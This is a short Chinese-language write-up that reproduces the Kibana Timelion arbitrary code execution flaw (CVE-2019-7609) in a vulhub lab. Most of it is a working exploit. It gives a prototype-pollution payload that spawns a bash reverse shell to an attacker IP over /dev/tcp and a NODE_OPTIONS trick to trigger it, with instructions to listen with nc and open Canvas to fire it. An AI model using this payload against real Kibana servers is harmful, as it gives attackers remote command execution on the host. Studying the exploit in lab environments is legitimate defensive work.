影响范围:
Kibana<5.6.15
Kibana<6.6.1
漏洞描述:
Kibana基于node.js实现
5.6.15 和 6.6.1 之前的 Kibana 版本在 Timelion 可视化器中包含任意代码执行缺陷。有权访问 Timelion 应用程序的攻击者可以发送尝试执行 JavaScript 代码的请求。这可能会导致攻击者使用主机系统上 Kibana 进程的权限执行任意命令。
复现操作步骤:
使用vulhub搭建靶场。
点击菜单栏中的Timelion功能,将反弹shell的payload填入并运行
payload:.es(*).props(label.proto.env.AAAA=‘require(“child_process”).exec(“bash -i >& /dev/tcp/192.168.111.1/7410 0>&1”);process.exit()//’)
.props(label.proto.env.NODE_OPTIONS=‘–require /proc/self/environ’)
如果是在线搭建的靶场反弹shell 的IP设置自己VPS上使用NC监听的,本地搭建的靶场改自己本地攻击机NC监听的
然后需要点击左边Canvas功能进行访问即可触发命令。
参考链接:
https://vulhub.org/#/environments/kibana/CVE-2019-7609/